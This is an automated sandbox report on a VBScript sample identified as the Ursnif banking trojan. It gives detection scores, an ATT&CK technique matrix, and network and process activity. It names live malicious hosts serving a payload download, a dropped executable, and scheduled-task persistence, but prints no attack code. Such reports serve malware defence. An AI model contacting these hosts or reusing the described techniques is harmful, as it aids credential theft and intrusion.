
Analysis Report Nuovo documento 1.vbs

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 224946
Start date: 23.04.2020
Start time: 20:11:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 52s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Nuovo documento 1.vbs
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winVBS@35/66@14/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 7.4% (good quality ratio 7.4%)
  • Quality average: 88.6%
  • Quality standard deviation: 20.2%
HCA Information:
  • Successful, ratio: 82%
  • Number of executed functions: 49
  • Number of non-executed functions: 23
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .vbs
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 205.185.216.42, 205.185.216.10, 104.76.47.40, 152.199.19.161, 23.61.220.90
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, go.microsoft.com.edgekey.net, prod.fs.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Whitelisted: false
Threat: Ursnif
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.
Uses HTTPS for network communication; use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis.



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation21 | Scheduled Task1 | Process Injection112 | Software Packing21 | Input Capture1 | System Time Discovery1 | Remote File Copy12 | Input Capture1 | Data Encrypted1 | Remote File Copy12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | PowerShell1 | Port Monitors | Scheduled Task1 | Disabling Security Tools1 | Network Sniffing | Account Discovery1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Scripting21 | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information1 | Input Capture | Security Software Discovery21 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Execution through API3 | System Firmware | DLL Search Order Hijacking | Scripting21 | Credentials in Files | File and Directory Discovery1 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol13 | SIM Card Swap | | Premium SMS Toll Fraud
Exploit Public-Facing Application | Exploitation for Client Execution1 | Shortcut Modification | File System Permissions Weakness | Obfuscated Files or Information2 | Account Manipulation | System Information Discovery23 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface1 | Modify Existing Service | New Service | Masquerading1 | Brute Force | Query Registry1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | | Abuse Accessibility Features
Spearphishing Attachment | Scheduled Task1 | Path Interception | Scheduled Task | Virtualization/Sandbox Evasion2 | Two-Factor Authentication Interception | Virtualization/Sandbox Evasion2 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | Process Injection112 | Bash History | Process Discovery2 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Supply Chain Compromise | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | Application Window Discovery1 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption | Rogue Cellular Base Station | | Data Destruction
Trusted Relationship | PowerShell | Change Default File Association | Exploitation for Privilege Escalation | Scripting | Keychain | System Owner/User Discovery1 | Taint Shared Content | Audio Capture | Commonly Used Port | Connection Proxy | | | Data Encrypted for Impact
Hardware Additions | Execution through API | File System Permissions Weakness | Valid Accounts | Indicator Removal from Tools | Private Keys | Remote System Discovery1 | Replication Through Removable Media | Video Capture | Standard Application Layer Protocol | Communication Through Removable Media | | | Disk Structure Wipe

Signature Overview



AV Detection:

Multi AV Scanner detection for domain / URL
Source: http://rolandojgarcia.com/pagigpy75.php | Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: Nuovo documento 1.vbs | Virustotal: Detection: 10%
Source: Nuovo documento 1.vbs | ReversingLabs: Detection: 12%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.PaintHelper.exe.710000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.PaintHelper.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation

Networking:

Downloads executable code via HTTP
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 23 Apr 2020 18:13:25 GMT | Server: Apache/2.4.18 (Ubuntu) | Content-Length: 845368 | Content-Disposition: attachment; filename=2_exx.bin | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/octet-stream
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Downloads files
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /pagigpy75.php HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Language: en-US | User-Agent: SanAntonio | Host: rolandojgarcia.com
Found strings which match to known social media urls
Source: msapplication.xml1.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x665a6569,0x01d619e6</date><accdate>0x665a6569,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x66625dfb,0x01d619e6</date><accdate>0x66625dfb,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x6664e69a,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.7.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6664e69a,0x01d619e6</date><accdate>0x66675b7d,0x01d619e6</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: rolandojgarcia.com
Urls found in memory or binary data
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.715171781.000002A59A6E6000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.698583864.000002A59A6E5000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php
Source: wscript.exe, 00000000.00000003.698787006.000002A59A69C000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php2
Source: wscript.exe, 00000000.00000003.712803748.000002A59C860000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php:
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.714791320.000002A59A61C000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/pagigpy75.phpO5?
Source: wscript.exe, 00000000.00000003.712104779.000002A59A61B000.00000004.00000001.sdmp | String found in binary or memory: http://rolandojgarcia.com/pagigpy75.php_______Set
Source: msapplication.xml.7.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.7.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.7.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.7.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.7.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.7.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.7.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.7.dr | String found in binary or memory: http://www.youtube.com/
Source: PaintHelper.exe, 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp | String found in binary or memory: https://barecao.xyz
Source: imagestore.dat.7.dr | String found in binary or memory: https://barecao.xyz/favicon.ico
Source: PaintHelper.exe, 00000004.00000003.879173344.0000000000887000.00000004.00000001.sdmp, PaintHelper.exe, 00000004.00000002.993292410.0000000000D90000.00000002.00000001.sdmp, ~DF4F1F8F6F4B10894B.TMP.7.dr | String found in binary or memory: https://barecao.xyz/index.htm
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.dr | String found in binary or memory: https://barecao.xyz/index.htmRoot
Source: {A7B24F44-85D9-11EA-AAE5-44C1B3FB757B}.dat.7.dr | String found in binary or memory: https://barecao.xyz/index.htmdex.htm
Source: wscript.exe, 00000000.00000003.698903893.000002A5A1CBC000.00000004.00000001.sdmp, PaintHelper.exe.0.dr | String found in binary or memory: https://sectigo.com/CPS0C
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.714383775.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.719495034.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.716679919.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.714965520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.716504979.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.720170005.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.713227207.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.715552523.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.716343079.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.709062333.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.719801339.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.710475610.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.719652778.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.713639378.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.720057377.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.719930329.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.715968226.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.714019466.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.712856726.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.798832924.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.715250270.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.715740770.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.711519545.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.719176551.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.711997884.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.716177520.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.708287654.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.994090175.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.720225537.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.711015828.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.709810981.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.712422696.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.714678858.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.720304550.00000000033E0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PaintHelper.exe PID: 4196, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: PaintHelper.exe, 00000004.00000002.993083088.0000000000800000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif
(Same Yara matches as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above.)

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue (5 identical entries)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue (4 identical entries)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue (9 identical entries)
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00401EB5 NtQueryVirtualMemory, 4_2_00401EB5
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00724498 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError, 4_2_00724498
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00721D96 memcpy,memcpy,lstrcatW,CreateEventA,_wcsupr,lstrlenW,NtQueryInformationProcess,CloseHandle, 4_2_00721D96
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00721CCC RtlInitUnicodeString,NtSetValueKey,NtDeleteValueKey,NtClose,RtlNtStatusToDosError, 4_2_00721CCC
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_007212AF RtlInitUnicodeString,NtCreateKey, 4_2_007212AF
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_00401C94
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_0072B3F0
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Code function: 4_2_0072AB9A
Java / VBScript file with very long strings (likely obfuscated code)
Source: Nuovo documento 1.vbs | Initial sample: Strings found which are bigger than 50
Classification label
Source: classification engine | Classification label: mal100.troj.evad.winVBS@35/66@14/2
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active
Creates mutexes
Source: C:\Users\user\AppData\Local\Temp\PaintHelper.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\BD0F010C-8477-D729-4003-A9471CBE2200
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_01
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Executes visual basic scripts
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll (3 identical entries)
Reads ini files
Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Sample is known by Antivirus
Source: Nuovo documento 1.vbs | Virustotal: Detection: 10%
Source: Nuovo documento 1.vbs | ReversingLabs: Detection: 12%
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Nuovo documento 1.vbs'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\PaintHelper.exe C:\Users\user\AppData\Local\Temp\PaintHelper.exe
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9474 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75012 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75014 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75016 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9488 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75022 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9494 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75028 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9500 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:75034 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4368 CREDAT:9506 /prefetch:2
